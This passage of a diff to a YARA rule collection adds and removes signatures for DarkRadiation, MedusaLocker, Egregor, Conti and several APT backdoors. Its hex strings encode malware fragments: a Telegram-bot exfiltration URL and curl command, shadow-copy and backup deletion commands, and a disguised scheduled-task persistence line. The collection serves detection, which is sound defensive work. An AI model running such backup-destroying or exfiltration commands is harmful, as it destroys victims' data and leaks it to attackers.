-		$s3 = { 69 66 20 5b 5b 20 22 24 6d 61 73 74 65 72 22 20 21 3d 20 22 24 73 6c 61 76 65 22 20 5d 5d }
-		$s4 = { 75 73 65 72 5f 68 6f 73 74 3d 24 28 65 63 68 6f 20 22 24 7b 70 61 72 73 65 5f 61 72 67 7d 22 20 7c 20 61 77 6b 20 2d 46 20 22 7c 22 20 27 7b 70 72 69 6e 74 20 24 31 7d 27 29 }
-		$s5 = { 6d 61 73 74 65 72 3d 24 28 63 61 74 20 2f 74 6d 70 2f 2e 63 63 77 20 7c 20 77 63 20 2d 6c 29 }
-		$s6 = { 73 65 6e 64 5f 6d 65 73 73 61 67 65 20 24 69 64 20 22 24 28 68 6f 73 74 6e 61 6d 65 29 20 24 28 68 6f 73 74 6e 61 6d 65 20 2d 49 29 }
-		$s7 = { 73 74 61 72 74 5f 74 68 72 65 61 64 20 24 61 6c 6c 54 68 72 65 61 64 73 }
-		$s8 = { 69 70 5f 68 6f 73 74 3d 24 28 65 63 68 6f 20 22 24 7b 70 61 72 73 65 5f 61 72 67 7d 22 20 7c 20 61 77 6b 20 2d 46 20 22 7c 22 20 27 7b 70 72 69 6e 74 20 24 32 7d 27 29 }
-		$s9 = { 70 6f 72 74 5f 68 6f 73 74 3d 24 28 65 63 68 6f 20 22 24 7b 70 61 72 73 65 5f 61 72 67 7d 22 20 7c 20 61 77 6b 20 2d 46 20 22 7c 22 20 27 7b 70 72 69 6e 74 20 24 33 7d 27 29 }
-		$s10 = { 24 28 63 75 72 6c 20 2d 73 20 2d 2d 69 6e 73 65 63 75 72 65 20 2d 2d 64 61 74 61 2d 75 72 6c 65 6e 63 6f 64 65 20 22 74 65 78 74 3d [2-15] 22 20 22 24 4d 53 47 5f 55 52 4c [2-15] 22 20 26 29 }
-		$s11 = { 73 6c 61 76 65 3d 24 28 65 63 68 6f 20 22 24 7b [2-15] 7d 22 20 7c 20 77 63 20 2d 6c 29 }
+		$dbg1 = { 55 6e 65 78 70 65 63 74 65 64 20 65 72 72 6f 72 2c 20 72 65 74 75 72 6e 20 63 6f 64 65 20 3d 20 25 30 38 58 0a }
+		$dbg2 = { 47 72 65 65 74 69 6e 67 73 20 [3-10] 21 }
+		$dbg3 = { 63 79 63 6c 65 73 3d 25 6c 75 20 72 61 74 69 6f 3d 25 6c 75 20 6d 69 6c 6c 69 73 65 63 73 3d 25 6c 75 20 73 65 63 73 3d 25 6c 75 20 68 61 72 64 66 61 69 6c 3d 25 64 20 61 3d 25 6c 75 20 62 3d 25 6c 75 0a }
+		$dbg4 = { 53 48 41 2d 25 64 20 74 65 73 74 20 23 25 64 3a }
+		$lib1 = "pthread_mutex_unlock@@GLIBC_2.2.5" fullword ascii
+		$lib2 = "pthread_mutex_lock@@GLIBC_2.2.5" fullword ascii
+		$lib3 = "mbedtls_rsa_import" fullword ascii
+		$lib4 = "mbedtls_rsa_export" fullword ascii
+		$lib5 = "mbedtls_oid_get_extended_key_usage" fullword ascii
+		$lib6 = "mbedtls_sha256_process" fullword ascii
+		$seq1 = { 48 83 ec 20 89 7d ec 48 89 75 e0 b8 00 00 00 00 e8 77 00 00 00 48 8d 45 f0 b9 00 00 00 00 48 8d 15 b5 ff ff ff be 00 00 00 00 48 89 c7 e8 d6 fb ff ff c7 45 fc 01 00 00 00 eb }
+		$seq2 = { 00 00 00 00 e8 b2 fe ff ff 48 8b 45 e8 48 89 c7 e8 92 ed ff ff 48 83 c0 01 48 89 c7 e8 c6 ee ff ff 48 89 45 f8 48 83 7d f8 00 74 3a 48 8b 55 e8 48 8b 45 f8 48 89 d6 48 89 c7 e8 f8 ec ff ff 48 8b 45 f8 48 89 c7 e8 12 fd ff ff 48 8b 45 f8 48 89 c7 e8 90 ec ff ff b8 00 00 00 00 e8 95 fc ff ff }
+		$seq3 = { e5 41 55 41 54 53 48 81 ec 18 18 00 00 c7 45 dc 00 00 00 00 48 c7 45 d0 00 00 00 00 bf 00 00 00 00 e8 13 fd ff ff 89 c7 e8 7c fc ff ff e8 d7 fd ff ff 41 89 c5 e8 cf fd ff ff 41 89 c4 e8 c7 fd ff ff 89 c3 e8 c0 fd ff ff 89 c2 48 8d 85 d0 e7 ff ff 4d 89 e9 4d 89 e0 48 89 d9 48 8d 35 bf 0a 02 00 48 89 }
 
 	condition:
-		filesize > 1KB and 6 of ( $s* )
+		uint16( 0 ) == 0x457f and filesize > 80KB and 3 of ( $dbg* ) and 4 of ( $lib* ) and 2 of ( $seq* )
 }
 rule ARKBIRD_SOLG_RAN_ELK_Darkradiation_Jul_2021_3 : FILE
 {
@@ -157466,6 +157091,43 @@ rule ARKBIRD_SOLG_RAN_ELK_Darkradiation_Jul_2021_1 : FILE
 	condition:
 		filesize > 5KB and 5 of ( $s* )
 }
+rule ARKBIRD_SOLG_RAN_ELK_Darkradiation_Jul_2021_2 : FILE
+{
+	meta:
+		description = "Detect the DarkRadiation ransomware"
+		author = "Arkbird_SOLG"
+		id = "3580a41a-ba2e-5a47-b35d-b2482fbc913a"
+		date = "2021-07-03"
+		modified = "2021-07-05"
+		reference = "https://bazaar.abuse.ch/browse/tag/DarkRadiation/"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-07-04/DarkRadiation/RAN_ELK_DarkRadiation_Jul_2021_2.yara#L1-L27"
+		license_url = "N/A"
+		logic_hash = "b21db1658845cafe37950d69b5bc0aab203e7bea3e43f95394236e0133234e2d"
+		score = 75
+		quality = 57
+		tags = "FILE"
+		hash1 = "3bab2947305c00df66cb4d6aaef006f10aca348c17aa2fd28e53363a08b7ec68"
+		hash2 = "652ee7b470c393c1de1dfdcd8cb834ff0dd23c93646739f1f475f71a6c138edd"
+		hash3 = "79aee7a4459d49dc6dfebf1a45d32ccc3769a1e5c1f231777ced3769607ba9c1"
+		tlp = "White"
+		adversary = "FERRUM"
+
+	strings:
+		$s1 = { 61 6c 6c 54 68 72 65 61 64 73 3d 28 24 31 29 }
+		$s2 = { 4d 53 47 5f 55 52 4c 3d 27 68 74 74 70 73 3a 2f 2f 61 70 69 2e 74 65 6c 65 67 72 61 6d 2e 6f 72 67 2f 62 6f 74 27 24 54 4f 4b 45 4e 27 2f 73 65 6e 64 4d 65 73 73 61 67 65 3f 63 68 61 74 5f 69 64 3d 27 }
+		$s3 = { 69 66 20 5b 5b 20 22 24 6d 61 73 74 65 72 22 20 21 3d 20 22 24 73 6c 61 76 65 22 20 5d 5d }
+		$s4 = { 75 73 65 72 5f 68 6f 73 74 3d 24 28 65 63 68 6f 20 22 24 7b 70 61 72 73 65 5f 61 72 67 7d 22 20 7c 20 61 77 6b 20 2d 46 20 22 7c 22 20 27 7b 70 72 69 6e 74 20 24 31 7d 27 29 }
+		$s5 = { 6d 61 73 74 65 72 3d 24 28 63 61 74 20 2f 74 6d 70 2f 2e 63 63 77 20 7c 20 77 63 20 2d 6c 29 }
+		$s6 = { 73 65 6e 64 5f 6d 65 73 73 61 67 65 20 24 69 64 20 22 24 28 68 6f 73 74 6e 61 6d 65 29 20 24 28 68 6f 73 74 6e 61 6d 65 20 2d 49 29 }
+		$s7 = { 73 74 61 72 74 5f 74 68 72 65 61 64 20 24 61 6c 6c 54 68 72 65 61 64 73 }
+		$s8 = { 69 70 5f 68 6f 73 74 3d 24 28 65 63 68 6f 20 22 24 7b 70 61 72 73 65 5f 61 72 67 7d 22 20 7c 20 61 77 6b 20 2d 46 20 22 7c 22 20 27 7b 70 72 69 6e 74 20 24 32 7d 27 29 }
+		$s9 = { 70 6f 72 74 5f 68 6f 73 74 3d 24 28 65 63 68 6f 20 22 24 7b 70 61 72 73 65 5f 61 72 67 7d 22 20 7c 20 61 77 6b 20 2d 46 20 22 7c 22 20 27 7b 70 72 69 6e 74 20 24 33 7d 27 29 }
+		$s10 = { 24 28 63 75 72 6c 20 2d 73 20 2d 2d 69 6e 73 65 63 75 72 65 20 2d 2d 64 61 74 61 2d 75 72 6c 65 6e 63 6f 64 65 20 22 74 65 78 74 3d [2-15] 22 20 22 24 4d 53 47 5f 55 52 4c [2-15] 22 20 26 29 }
+		$s11 = { 73 6c 61 76 65 3d 24 28 65 63 68 6f 20 22 24 7b [2-15] 7d 22 20 7c 20 77 63 20 2d 6c 29 }
+
+	condition:
+		filesize > 1KB and 6 of ( $s* )
+}
 rule ARKBIRD_SOLG_MAL_ELF_Specter_Jul_2021_1 : FILE
 {
 	meta:
@@ -157532,3294 +157194,3419 @@ rule ARKBIRD_SOLG_MAL_ELF_Bioset_Jul_2021_1 : FILE
 	condition:
 		uint32( 0 ) == 0x464c457f and filesize > 10KB and 6 of ( $s* )
 }
-rule ARKBIRD_SOLG_Mal_Smanager_Installer_Module_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_RAN_Medusalocker_Aug_2021_1 : FILE
 {
 	meta:
-		description = "Detect installer module of Smanager (November 2020)"
+		description = "Detect MedusaLocker ransomware"
 		author = "Arkbird_SOLG"
-		id = "364285bc-2173-5ff0-85d2-af06051a3b70"
-		date = "2020-12-19"
-		modified = "2020-12-19"
-		reference = "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-19/Mal_Smanager_Installer_Module_Nov_2020_1.yar#L1-L24"
+		id = "9e647371-b37a-53af-bfb6-cde72855b564"
+		date = "2021-08-08"
+		modified = "2021-08-08"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-08-08/medusalocker/RAN_MedusaLocker_Aug_2021_1.yara#L1-L29"
 		license_url = "N/A"
-		logic_hash = "380d28f6cdea24f807f3c29207eb0b8888ebdfea215c53df164fe080c3917438"
+		logic_hash = "40dd3ec16eefc59cb25c8855fb62cda1d642ec711226c1c964fd26384be7ef15"
 		score = 75
-		quality = 61
+		quality = 73
 		tags = "FILE"
-		hash1 = "97a5fe1d2174e9d34cee8c1d6751bf01f99d8f40b1ae0bce205b8f2f0483225c"
+		hash1 = "4f9a833e79092006c06203a66b41fc9250bcebcee148fea404db75d52035131c"
+		hash2 = "212e7f5ed4a581b4d778dfef226738c6db56b4b4006526259392d03062587887"
+		hash3 = "a25c0227728878c386ab6dba139976cb10e853dd3cd1eb3623f236ee8e1df212"
+		hash4 = "c2a0a317d73c96428ab088a8f0636ec4ccace7ca691c84ed66a83a70183f40dc"
+		hash5 = "0abb4a302819cdca6c9f56893ca2b52856b55a0aa68a3cb8bdcd55dcc1fad9ad"
+		hash6 = "f5fb7fa5231c18f0951c755c4cb0ec07b0889b5e320f42213cbf6bbbe499ad31"
+		tlp = "white"
+		adversary = "RaaS"
 
 	strings:
-		$s1 = { 63 6d 64 20 2f 63 20 73 63 68 74 61 73 6b 73 20 2f 46 20 2f 63 72 65 61 74 65 20 2f 74 6e 3a 57 69 6e 64 6f 77 73 5c 55 70 64 61 74 65 20 2f 74 72 20 22 25 73 22 20 20 20 2f 73 63 20 48 4f 55 52 4c 59 }
-		$s2 = { 25 73 5c 73 79 73 74 65 6d 33 32 5c 73 76 63 68 6f 73 74 2e 65 78 65 20 2d 6b 20 25 73 }
-		$s3 = { 25 73 79 73 74 65 6d 72 6f 6f 74 25 }
-		$s4 = { 25 55 53 45 52 50 52 4f 46 49 4c 45 25 5c [1-8] 5c [1-8] 2e 63 61 62 }
-		$s5 = { 53 6d 61 6e 61 67 65 72 5f 73 73 6c 2e 64 6c 6c }
-		$s6 = { 53 4f 46 54 57 41 52 45 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 20 4e 54 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 53 76 63 68 6f 73 74 }
-		$s7 = { 53 59 53 54 45 4d 5c 43 75 72 72 65 6e 74 43 6f 6e 74 72 6f 6c 53 65 74 5c 53 65 72 76 69 63 65 73 5c }
-		$s8 = { 43 3a 5c 77 69 6e 64 6f 77 73 5c 61 70 70 70 61 74 63 68 5c }
-		$s9 = "TmV0QmlvcyBNZXNzYWdlciBSZWdpc3Rlcg==" fullword ascii
-		$s10 = { 68 74 74 70 73 3d 25 5b 5e 3a 5d 3a 25 64 00 00 68 74 74 70 73 3d 00 00 73 6f 63 6b 73 3d 25 5b 5e 3a 5d 3a 25 64 00 00 73 6f 63 6b 73 3d 00 00 68 74 74 70 3d 25 5b 5e 3a 5d 3a 25 64 00 00 00 68 74 74 70 3d }
-		$s11 = "&About VVSup..." fullword wide
-		$s12 = "%d.tmp" fullword ascii
+		$s1 = "{8761ABBD-7F85-42EE-B272-A76179687C63}" fullword wide
+		$s2 = { 83 c4 08 8d 8d ?? fe ff ff e8 [2] ff ff 8d 8d ?? fe ff ff e8 [2] ff ff 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 68 [2] 48 00 8d 8d [2] ff ff e8 [2] 00 00 8d 8d [2] ff ff 51 e8 ?? f9 ff ff 83 c4 04 88 85 2b ff ff ff 8d 8d [2] ff ff e8 [2] 00 00 0f b6 95 2b ff ff ff 85 d2 74 1e 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 33 c0 e9 [2] 00 00 8d 4d fa e8 [2] ff ff 8d 4d fa e8 [2] 01 00 8d 4d fa e8 [2] 01 00 8d 4d fa e8 [2] 01 00 0f b6 c0 85 c0 74 0c c7 85 ?? fe ff ff [2] 48 00 eb 0a c7 85 ?? fe ff ff [2] 48 00 8b 8d ?? fe ff ff 89 8d ?? fe ff ff 8d 95 ?? fe ff ff 52 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff e8 ?? f8 ff ff 8d 4d 8c e8 [2] 00 00 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff b9 [2] 4a 00 e8 [2] ff ff 50 e8 [2] ff ff 83 c4 04 50 8d 4d 8c e8 [2] 00 00 0f b6 c0 85 c0 75 41 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff e8 ?? c6 ff ff c7 85 ?? fe ff ff 00 00 00 00 8d 4d 8c e8 [2] 00 00 8d 4d fa e8 [2] ff ff 8b 85 ?? fe ff ff e9 [2] 00 00 68 [2] 48 00 8d 8d ?? ff ff ff e8 [2] ff ff 8b c8 e8 [2] ff ff 68 [2] 48 00 8d 8d ?? fe ff ff e8 [2] 00 00 8d 8d ?? fd ff ff 51 8d 4d 8c e8 [2] 00 00 50 e8 [2] ff ff 83 c4 04 50 8d 95 ?? fe ff ff 52 b9 [2] 4a 00 e8 [2] 00 00 0f b6 c0 85 c0 75 0c c7 85 ?? fe ff ff 01 00 00 00 eb 0a c7 85 ?? fe ff ff 00 00 00 00 8a 8d ?? fe ff ff 88 8d 2a ff ff ff 8d 8d ?? fd ff ff e8 [2] 00 00 8d 8d ?? fe ff ff }
+		$s3 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 62 00 6f 00 6f 00 74 00 73 00 74 00 61 00 74 00 75 00 73 00 70 00 6f 00 6c 00 69 00 63 00 79 00 20 00 69 00 67 00 6e 00 6f 00 72 00 65 00 61 00 6c 00 6c 00 66 00 61 00 69 00 6c 00 75 00 72 00 65 00 73 }
+		$s4 = { 42 67 49 41 41 41 43 6b 41 41 42 53 55 30 45 78 }
+		$s5 = "wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest" fullword wide
+		$s6 = { 62 00 63 00 64 00 65 00 64 00 69 00 74 00 2e 00 65 00 78 00 65 00 20 00 2f 00 73 00 65 00 74 00 20 00 7b 00 64 00 65 00 66 00 61 00 75 00 6c 00 74 00 7d 00 20 00 72 00 65 00 63 00 6f 00 76 00 65 00 72 00 79 00 65 00 6e 00 61 00 62 00 6c 00 65 00 64 00 20 00 4e 00 6f }
+		$s7 = { 76 00 73 00 73 00 61 00 64 00 6d 00 69 00 6e 00 2e 00 65 00 78 00 65 00 20 00 44 00 65 00 6c 00 65 00 74 00 65 00 20 00 53 00 68 00 61 00 64 00 6f 00 77 00 73 00 20 00 2f 00 41 00 6c 00 6c 00 20 00 2f 00 51 00 75 00 69 00 65 00 74 }
+		$s8 = { 77 00 6d 00 69 00 63 00 2e 00 65 00 78 00 65 00 20 00 53 00 48 00 41 00 44 00 4f 00 57 00 43 00 4f 00 50 00 59 00 20 00 2f 00 6e 00 6f 00 69 00 6e 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00 76 00 65 }
+		$s9 = { 77 00 62 00 61 00 64 00 6d 00 69 00 6e 00 20 00 44 00 45 00 4c 00 45 00 54 00 45 00 20 00 53 00 59 00 53 00 54 00 45 00 4d 00 53 00 54 00 41 00 54 00 45 00 42 00 41 00 43 00 4b 00 55 00 50 }
+		$s10 = { 33 c0 48 89 44 24 40 48 c7 44 24 48 07 00 00 00 66 89 44 24 30 44 8d 40 26 48 8d 15 [2] 09 00 48 8d 4c 24 30 e8 [2] ff ff 48 83 7c 24 40 00 74 42 4c 8d 44 24 30 48 83 7c 24 48 08 4c 0f 43 44 24 30 33 d2 b9 01 00 1f 00 ff 15 [2] 07 00 48 85 c0 75 1f 4c 8d 44 24 30 48 83 7c 24 48 08 4c 0f 43 44 24 30 33 d2 33 c9 ff 15 [2] 07 00 32 db eb 02 b3 01 48 8b 54 24 48 48 83 fa 08 72 37 48 8d 14 55 02 00 00 00 48 8b 4c 24 30 48 8b c1 48 81 fa 00 10 00 00 72 19 48 83 c2 27 48 8b 49 f8 48 2b c1 48 83 c0 f8 48 83 f8 1f 0f 87 d3 00 00 00 e8 [2] 03 00 84 db 0f 85 ad 00 00 00 e8 3e 36 00 00 84 c0 75 05 e8 c5 36 00 00 e8 ?? 94 ff ff 48 8d 1d [2] 0d 00 48 8d 4c 24 30 e8 [2] ff ff 48 8b f8 48 8d 35 [2] 0d 00 0f 1f }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 90KB and 7 of them
+		uint16( 0 ) == 0x5A4D and filesize > 150KB and 9 of ( $s* )
 }
-rule ARKBIRD_SOLG_Mal_Funnydream_Backdoor_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_Ran_Egregor_Oct_2020_1 : FILE
 {
 	meta:
-		description = "Detect backdoor used by FunnyDream (November 2020)"
+		description = "Detect Egregor / Maze ransomware by Maze blocks"
 		author = "Arkbird_SOLG"
-		id = "48120ba2-adaa-5098-8d8c-5c32bbafb9f6"
-		date = "2020-12-19"
-		modified = "2020-12-19"
-		reference = "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-19/Mal_FunnyDream_Backdoor_Nov_2020_1.yar#L1-L22"
+		id = "03d3ee25-cd0c-573e-beca-e4ff4377da9f"
+		date = "2020-10-29"
+		modified = "2023-11-22"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-10-31/Ran_Egregor_Oct_2020_1 .yar#L1-L21"
 		license_url = "N/A"
-		logic_hash = "d12c465c735f09295b382fd5679d411c5114c232dabc22be84151e436f8fa199"
+		logic_hash = "d7d03db002b74d031b725db60e38a46abce564fb090b013aa9ec66376b430000"
 		score = 75
-		quality = 67
+		quality = 75
 		tags = "FILE"
-		hash1 = "ce5c8741bffa8de5093d1831d736a7e478a54baa3676da37cde24f38d10f3529"
+		hash1 = "14e547bebaa738b8605ba4182c4379317d121e268f846c0ed3da171375e65fe4"
+		hash2 = "af538ab1b8bdfbf5b7f1548d72c0d042eb14d0011d796cab266f0671720abb4d"
+		hash3 = "42ac07c5175d88d6528cfe3dceacd01834323f10c4af98b1a190d5af7a7bb1cb"
+		hash4 = "4139c96d16875d1c3d12c27086775437b26d3c0ebdcdc258fb012d23b9ef8345"
 
 	strings:
-		$s1 = { 25 64 25 64 25 64 20 25 64 3a 25 64 }
-		$s2 = { 73 5c 53 6f 66 74 77 61 72 65 5c 4d 69 63 72 6f 73 6f 66 74 5c 57 69 6e 64 6f 77 73 5c 43 75 72 72 65 6e 74 56 65 72 73 69 6f 6e 5c 49 6e 74 65 72 6e 65 74 20 53 65 74 74 69 6e 67 73 00 00 50 72 6f 78 79 45 6e 61 62 6c 65 00 50 72 6f 78 79 53 65 72 76 65 }
-		$s3 = { 48 41 52 44 57 41 52 45 5c 44 45 53 43 52 49 50 54 49 4f 4e 5c 53 79 73 74 65 6d 5c 43 65 6e 74 72 61 6c 50 72 6f 63 65 73 73 6f 72 5c 30 }
-		$s4 = { 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 25 75 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 25 75 25 73 25 73 0d 0a 53 65 72 76 65 72 3a 20 53 69 6d 70 6c 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 }
-		$s5 = { 43 4f 4e 4e 45 43 54 20 25 73 3a 25 64 20 48 54 54 50 2f 31 2e 30 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 6f 7a 69 6c 6c 61 2f 35 2e 30 20 28 63 6f 6d 70 61 74 69 62 6c 65 3b 20 4d 53 49 45 20 31 30 2e 30 3b 20 57 69 6e 64 6f 77 73 20 4e 54 20 36 2e 31 3b 29 0d 0a 50 72 6f 78 79 2d 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 25 73 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 0d 0a }
-		$s6 = { 31 32 33 34 35 36 00 00 55 73 65 72 2d 30 30 31 }
-		$s7 = { 25 73 20 25 73 25 73 2f 25 73 2f 25 30 38 58 25 30 38 58 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 75 2f 25 30 38 58 25 30 38 78 }
-		$s8 = { 63 6c 74 2e 65 78 65 00 44 6c 6c 49 6e 73 74 61 6c 6c 00 53 74 61 72 74 }
-		$s9 = { 32 30 30 20 43 6f 6e 6e 65 63 74 69 6f 6e 20 65 73 74 61 62 6c 69 73 68 65 64 }
-		$s10 = { 5c 63 6d 64 c7 85 e0 fe ff ff 2e 65 78 65 }
+		$x1 = { 45 f4 8b 4d 10 8b 09 0f b7 49 06 39 c8 0f 8d a2 00 00 00 8b 45 e4 83 78 10 00 75 48 8b 45 0c 8b 40 38 89 45 f0 83 7d f0 00 7e 37 31 c0 8b 4d ec 8b 55 e4 03 4a 0c 89 4d e8 8b 4d e8 8b 55 e4 89 4a 08 8b 4d f0 8b 55 e8 89 14 24 c7 44 24 04 00 00 00 00 89 4c 24 08 89 45 d4 e8 9e c6 ff ff 89 45 d0 eb 3a 8b 45 ec 8b 4d e4 03 41 0c 89 45 e8 8b 45 e4 8b 40 10 8b 4d 08 8b 55 e4 03 4a 14 8b 55 e8 89 14 24 89 4c 24 04 89 44 24 08 e8 77 a1 ff ff 8b 4d e8 8b 55 e4 89 4a 08 89 45 cc 8b 45 f4 83 c0 01 89 45 f4 8b 45 e4 83 c0 28 89 45 e4 }
+		$x2 = { 8b 45 f0 83 38 00 0f 86 a0 00 00 00 8b 45 f8 8b 4d f0 03 01 89 45 ec 8b 45 f0 83 c0 08 89 45 e8 c7 45 fc 00 00 00 00 8b 45 fc 8b 4d f0 8b 49 04 83 e9 08 d1 e9 39 c8 73 62 8b 45 e8 0f b7 00 c1 e8 0c 89 45 e0 8b 45 e8 0f b7 00 25 ff 0f 00 00 89 45 dc 8b 45 e0 85 c0 89 45 d0 74 0f eb 00 8b 45 d0 83 e8 03 89 45 cc 74 04 eb 17 eb 17 8b 45 ec 03 45 dc 89 45 e4 8b 45 0c 8b 4d e4 03 01 89 01 eb 02 eb 00 eb 00 8b 45 fc 83 c0 01 89 45 fc 8b 45 e8 83 c0 02 89 45 e8 eb 8c 8b 45 f0 8b 4d f0 03 41 04 89 45 f0 }
+		$x3 = { 8b 45 f0 8b 4d ec 03 01 89 45 e8 8b 45 e8 89 04 24 c7 44 24 04 14 00 00 00 ff 15 38 f0 0b 10 83 ec 08 31 c9 88 ca 83 f8 00 88 55 cf 75 0d 8b 45 e8 83 78 0c 00 0f 95 c1 88 4d cf 8a 45 cf a8 01 75 05 e9 6e 01 00 00 8b 45 f0 8b 4d e8 03 41 0c 89 04 24 ff 15 3c f0 0b 10 83 ec 04 89 45 dc 8b 45 dc b9 ff ff ff ff 39 c8 }
+		$op1 = { 60 8b 7d 08 8b 4d 10 8b 45 0c f3 aa 61 89 45 f0 }
+		$op2 = { 83 7d 08 00 89 45 ec 89 4d e8 89 55 e4 }
+		$op3 = { 89 4d e8 89 55 e4 75 09 c7 45 f0 00 00 00 00 }
+		$op4 = { 75 09 c7 45 f0 00 00 00 00 eb 17 60 }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize > 90KB and 6 of them
+		uint16( 0 ) == 0x5a4d and filesize > 350KB and ( 3 of ( $op* ) or 2 of ( $x* ) )
 }
-rule ARKBIRD_SOLG_Mal_Phantomnet_Nov_2020_1 : FILE
+rule ARKBIRD_SOLG_RAN_Conti_May_2021_1 : FILE
 {
 	meta:
-		description = "Detect PhantomNet (November 2020)"
+		description = "Detect packed Conti ransomware (May 2021) [Common parts with Vidar packer, possible false positives to Vidar stealer or Danabot"
 		author = "Arkbird_SOLG"
-		id = "16ddcc9a-8254-5d40-adcd-70ebe212fc78"
-		date = "2020-12-19"
-		modified = "2020-12-19"
-		reference = "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager"
-		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2020-12-19/Mal_PhantomNet_Nov_2020_1.yar#L1-L24"
+		id = "661182f7-4716-50d1-8d98-9fb272cf43eb"
+		date = "2021-05-19"
+		modified = "2021-05-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/StrangerealIntel/DailyIOC/blob/a873ff1298c43705e9c67286f3014f4300dd04f7/2021-05-20/Conti/RAN_Conti_May_2021_1.yara#L1-L18"
 		license_url = "N/A"
-		logic_hash = "a08467f68968fb0dfa82bca5984e1ad823f222946bd0acb62db418556a9a347a"
-		score = 75
-		quality = 65
+		logic_hash = "397f99dee35d8a0c5f564655e952f8a55d347a74303eadfc6788bd6ff0f6c4c5"
+		score = 50
+		quality = 75
 		tags = "FILE"
-		hash1 = "ea7b2def3335b81048aac8fc372349f38453b676fa833603b7e15c45437f6858"
-		hash2 = "338502691f6861ae54e651a25a08e62eeca9febc6830978a670d44caf3d5d056"
+		hash1 = "Redacted"
+		tlp = "White"
+		adversary = "RAAS"
+		level = "Experimental"
 
 	strings:
-		$s1 = { 25 73 25 30 38 58 }
-		$s2 = { 68 00 74 00 74 00 70 00 5c 00 73 00 68 00 65 00 6c 00 6c 00 5c 00 6f 00 70 00 65 00 6e 00 5c 00 63 00 6f 00 6d 00 6d 00 61 00 6e 00 64 }
-		$s3 = { 6b 25 34 64 2d 25 30 32 64 2d 25 30 32 64 }
-		$s4 = { 47 6c 6f 62 61 6c 5c 47 6c 6f 62 61 6c 41 63 70 72 6f 74 65 63 74 4d 75 74 65 78 }
-		$s5 = "Proxy-Authorization: NTLM" fullword ascii
-		$s6 = { 50 72 6f 78 79 2d 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 6b 65 65 70 2d 61 6c 69 76 65 0d 0a }
-		$s7 = { 48 54 54 50 2f 31 2e 31 20 00 00 00 48 54 54 50 2f 31 2e 30 20 }
-		$s8 = { 52 00 6f 00 6f 00 74 00 5c 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 43 00 65 00 6e 00 74 00 65 00 72 00 32 00 00 00 00 00 53 45 4c 45 43 54 20 2a 20 46 52 4f 4d 20 41 6e 74 69 56 69 72 75 73 50 72 6f 64 75 63 74 00 00 57 51 4c }
-		$s9 = { 68 74 74 70 00 00 00 00 25 5b 5e 3a 5d 00 00 00 25 2a 5b 5e 3a 5d 3a 25 64 }
-		$s10 = { 48 6f 73 74 3a 20 }
-		$s11 = { 43 6f 6f 6b 69 65 73 3a 20 }
-		$s12 = "Proxy-Authenticate: NTLM" fullword ascii
+		$seq1 = { 55 8b ec [3-4] 00 00 [0-5] 56 57 83 3d [4] 25 0f 85 ?? 00 00 00 68 [2] 44 00 ff 15 [2] 42 00 3d f6 65 00 00 0f 85 ?? 00 00 00 6a 00 [0-2] ff 15 2c ?? 42 00 b9 ?? 00 00 00 be [2] 42 00 8d bd f8 f7 ff ff f3 a5 [2-4] 07 00 00 6a 00 8d 85 ?? f8 ff ff 50 e8 [4] 83 c4 0c 8d 4d f8 89 4d fc 6a 00 6a 00 [2-4] 06 00 00 }
